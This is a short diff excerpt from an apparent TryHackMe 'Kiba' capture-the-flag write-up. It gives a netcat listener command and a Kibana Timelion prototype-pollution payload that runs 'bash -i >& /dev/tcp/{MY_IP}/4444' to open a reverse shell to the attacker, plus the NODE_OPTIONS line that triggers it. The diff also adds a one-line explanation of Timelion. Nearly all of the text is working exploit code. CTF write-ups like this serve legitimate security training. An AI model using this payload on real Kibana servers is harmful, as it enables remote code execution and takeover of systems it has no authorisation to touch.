FryggFR/WriteUp/THM-kiba.md

 `nc -lnvp 4444`

 On the Timelion, we can use this payload :

-`
-.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/{MY_IP}/4444 0>&1");process.exit()//')
+*Timelion is a visualization tool for Kibana, he accept expressions with parameters* ` .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/{MY_IP}/4444 0>&1");process.exit()//')
 .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')